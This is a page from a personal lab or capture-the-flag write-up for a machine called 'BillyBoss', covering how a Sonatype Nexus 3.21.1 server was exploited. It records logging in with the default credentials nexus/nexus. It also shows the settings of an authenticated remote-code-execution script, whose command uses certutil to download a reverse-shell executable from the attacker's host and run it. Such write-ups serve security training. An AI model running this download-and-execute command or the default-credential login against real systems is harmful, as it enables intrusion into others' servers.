🎫
BillyBoss
  • BillyBoss
    • Summary
  • Enumeration
    • TCP
    • UDP
    • Web Services - 80
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
    • Web Services - 8081
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
    • Other Services
      • SMB
      • RPC
      • FTP
  • Exploitation
  • Priv Escalation
  • Notes to sefl
Powered by GitBook
On this page

Exploitation

PreviousFTPNextPriv Escalation

Last updated 2 years ago

With authentication I was able to figure out the password for the login page of the sonatype nexus repo manager. The user was nexus and so was the password.

#!/usr/bin/python3

import sys
import base64
import requests

URL='http://192.168.143.61:8081'
CMD='cmd.exe /c certutil -urlcache -f http://192.168.49.143:80/lyethar-shell-reverse.exe lyethar-shell-reverse.exe && lyethar-shell-reverse.exe'
USERNAME='nexus'
PASSWORD='nexus'

With a little modification I generated a my payload and made the exploit reach out to me and ultimately get a reverse shell.

LogoSonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)Exploit Database